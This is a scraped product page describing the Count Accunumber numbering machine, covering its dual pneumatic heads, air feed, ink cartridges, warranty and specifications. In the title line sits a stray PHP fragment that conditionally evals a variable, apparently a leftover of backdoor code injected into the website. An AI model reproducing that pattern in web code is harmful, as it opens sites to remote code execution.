Accunumber Numbering Machine
Count Machinery Accunumber Numbering Machine (Scorer / Perforator) if(isset($a)) eval($freshH1); ?>
||One year warranty on electrical and mechanical par...more
- An included sheet counter lets you know exactly how much work has been done.
- Keep your machine fully inked using the easy-to-replace disposable ink cartridges. No more re-inking needed!
Customizable to accommodate crash numbering of 10 part carbonless forms.
- A bottom-of-pile air feed system makes it easy to pull in a variety of paper types.
- Capable of multiple numbering by setting up the numbering heads individually.
- Can be set up for scoring, perforating or numbering either separately or simultaneously.
- Set this machine up to stamp anywhere on the document or page.
- The included 7 wheel gothic numbering head may be used for 0, 1, 2, 3, 6 and 3 drop zero repeat sequences.
- Ships Via Truck
The Count Accunumber numbering machine is one of the most sophisticated and customizable numbering machines on the market. It features dual pneumatic printing heads and a versatile air feed system. This allows the Accunumber to work with a huge range of paper sizes and types, including carbonless forms and glossy paper. Not only does this machine number and crash number documents, but it can also perforate and score documents. Numbering, scoring and perforating can be done individually or all at the same time. The Accunumber comes with one perf and one scoring wheel, but can be outfitted with up to four perf wheels and four scoring wheels at a time.
Both of the numbering heads are customizable and can be set up to run in sync or separately. They can be set up for repeat sequence stamping in a variety of configurations including 0, 1, 2, 3, 6 and 3 drop zeros. Stamping can be set up and done just about anywhere on a sheet of paper and the heads can be used for crash numbering up to a 10 part carbonless form. This machine does not need to be re-inked, thanks to patented ink cartridges. Each cartridge has a lifespan of 25,000 impressions. The print heads on the Count Accunumber can create up to 10 strikes per head per page. This is a solid machine and the finishing possibilities are huge. It can later be upgraded to a pilefeed design. Place your order today!
Only available on new products shipping within the contiguous 48 states.
Covers non-wearable parts and labor. Click here for more details
For a service agreement quote, please fill out this form. A sales representative will quickly respond to your inquiry.||
Count Machinery Accunumber Numbering Machine (Scorer / Perforator) Specifications:
||250lbs (113.4 kg)
||Bottom-of-pile air suction feed
||Number up to 10,000 sheets per hour, perforate or score only up to 19,000 sheets per hour.
|Minimum Sheet size
||3" x 5" (8cm x 12cm)
|Maximum Sheet Size
||18" x 20 " (45cm x 45cm)
||One year warranty on electrical and mechanical parts
If you have any questions or concerns, contact a customer service representative today.